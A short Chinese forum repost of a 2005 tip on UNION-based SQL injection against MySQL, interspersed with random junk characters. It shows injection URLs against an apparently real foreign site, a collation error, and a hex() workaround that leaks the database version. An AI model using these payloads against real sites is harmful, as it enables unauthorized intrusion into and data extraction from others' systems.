本文作者:SuperHei
7 n( M) z% c2 Z1 \文章性质:原创" \6 p- q, C6 I% }! T( a; t. Y0 g4 U; n
发布日期:2005-10-181 y9 F" q5 s1 d
测试个国外的站时:& F) e/ h6 e7 J5 H
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*+ f& S: c' V/ j8 w+ B% v
返回错误:7 y% a7 y+ r! P- c! x B/ \
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'5 d( I! J% F5 q0 q" w% v
MySQL Error No. 126
/ z- j; W, `2 c, D" `/ H* S+ A看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。0 ?, l {6 c5 x5 l) O. y/ V Y/ T
解决办法:转为其他编码如hex。) v9 @+ R3 L: x" N9 g! N
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
4 m& M; s& C8 Z; P5 a成功得到hex(version())的值为:1 k$ |. _0 e/ Z
342E312E332D626574617 U6 ?5 m+ E% Q6 r# ?: w/ C
回Mysql查询下得到:
' F G9 V& x! R2 W5 hmysql> select 0x342E312E332D62657461;# I- Q. m! V$ Z, W* T+ L
+------------------------+0 r# Z1 p, ]- ]" y
| 0x342E312E332D62657461 |$ S$ U; `6 h k5 `+ {# e
+------------------------+
. P: O: P; o8 K, j7 D. F* Q| 4.1.3-beta |% `! j, \, C" r6 N4 G5 s. J+ U
+------------------------+
. b2 I; ?2 s7 D8 J( w6 e1 row in set (0.00 sec)
& ~, k& j5 l$ y$ w9 S: k
1 c8 j! q' t* b1 U1 d) X |
发表于 2012-9-15 14:04:54
收藏
支持
反对